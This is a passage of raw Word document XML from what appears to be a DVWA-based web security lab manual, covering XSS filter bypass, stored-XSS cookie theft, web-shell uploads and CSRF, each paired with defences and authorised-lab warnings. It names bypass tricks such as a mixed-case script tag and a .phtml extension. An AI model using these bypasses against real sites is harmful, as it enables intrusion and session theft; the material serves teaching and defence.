                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium security</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, a simple filter removing the literal string </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;script&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> can sometimes be bypassed with mixed-case variations such as </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;ScRiPt&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> — this is shown here purely to illustrate why naive, pattern-based filtering is an unreliable defence, not as a general evasion guide.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Stored XSS cookie-theft risk:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> a script posted once (e.g. as a “comment”) fires automatically for every visitor afterwards. In a real (unauthorised) attack this could be used to read </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">document.cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and send it to an attacker-controlled server, hijacking the victim's session — which is exactly why this must only ever be demonstrated in the isolated DVWA lab, never against a real site.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="1E7B45" w:sz="6"/>
          <w:left w:val="single" w:color="1E7B45" w:sz="6"/>
          <w:bottom w:val="single" w:color="1E7B45" w:sz="6"/>
          <w:right w:val="single" w:color="1E7B45" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="E9F7EF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1E7B45"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">⚑ Defensive Measures</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Output encoding</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> (the primary defence — encode data before rendering it in HTML), </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Content Security Policy (CSP)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> as a strong secondary layer that restricts which scripts a browser will execute, input validation, and marking cookies </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">HttpOnly</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> so client-side scripts cannot read them even if XSS occurs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="B8860B" w:sz="6"/>
          <w:left w:val="single" w:color="B8860B" w:sz="6"/>
          <w:bottom w:val="single" w:color="B8860B" w:sz="6"/>
          <w:right w:val="single" w:color="B8860B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="FFF6E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B8860B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">✎ Example — What CSP is and how it defends against XSS (observation question)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Content Security Policy (CSP)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> is an HTTP response header that tells the browser which sources of scripts, styles and other content are allowed to load and run on a page — for example </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Content-Security-Policy: script-src 'self'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> only allows scripts from the site's own origin. Even if an attacker manages to inject an inline </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;script&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> tag via a vulnerability, a correctly configured CSP will block the browser from executing it, because inline scripts and scripts from other origins are refused by policy. CSP is defence-in-depth: it does not fix the underlying injection flaw, but it stops many injected scripts from actually running.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.6 File Upload Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A file upload feature becomes dangerous when the server does not properly validate what type of file was actually uploaded — trusting only the file extension or a browser-supplied MIME type, both of which an attacker can freely change.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="A33A3A" w:sz="6"/>
          <w:left w:val="single" w:color="A33A3A" w:sz="6"/>
          <w:bottom w:val="single" w:color="A33A3A" w:sz="6"/>
          <w:right w:val="single" w:color="A33A3A" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="FBEAEA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A33A3A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">⛔ Lab Safety — Authorised Lab Only</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">The web-shell upload described below is to be performed only against DVWA Low security inside the isolated lab. A web shell gives command execution on the server — never upload one to a system you do not own or are not explicitly authorised to test.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">On DVWA's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Low</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> security level, a PHP web shell (a small script letting the attacker run OS commands through the website) can be uploaded directly because the server performs no meaningful check on the file's content. Visiting the uploaded file's URL then executes it on the server.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="B8860B" w:sz="6"/>
          <w:left w:val="single" w:color="B8860B" w:sz="6"/>
          <w:bottom w:val="single" w:color="B8860B" w:sz="6"/>
          <w:right w:val="single" w:color="B8860B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="FFF6E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B8860B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">✎ Example — Three server-side controls that would have prevented this (observation question)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">1. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Validate file type by content (magic bytes), not extension</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> — check the actual file signature rather than trusting a </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">.jpg</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> extension or client-supplied MIME type.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">2. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Store uploads outside the web root, or rename them with no executable extension</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> — so even a malicious file cannot be reached by a direct URL that the web server would execute.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">3. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Disable script execution in the uploads directory</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> at the web-server configuration level, so even if a malicious file is stored there, the server will serve it as plain text/download rather than executing it.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">DVWA's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Medium</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> security level typically blocks obvious extensions like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, but this can sometimes be bypassed with alternate extensions the server still executes (such as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">.phtml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — which is why </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">server-side validation of content</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, not filenames, is the real fix.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.7 CSRF (Cross-Site Request Forgery)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CSRF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> tricks a logged-in victim's browser into submitting a request to a website without the victim's knowledge — for example, a hidden form on a malicious page that automatically submits a “change password” request to a site the victim happens to be logged into. Because the browser automatically attaches the victim's session cookie, the website cannot tell the request apart from one the victim intended to make.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="1E7B45" w:sz="6"/>
          <w:left w:val="single" w:color="1E7B45" w:sz="6"/>
          <w:bottom w:val="single" w:color="1E7B45" w:sz="6"/>
          <w:right w:val="single" w:color="1E7B45" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="E9F7EF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1E7B45"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">⚑ Defensive Measures</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">The standard defence is a </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">CSRF token</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">: a random, unique value the server embeds in every legitimate form and checks on submission. An attacker's forged request cannot know or guess this token, so the server rejects it. The </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">SameSite</w:t>
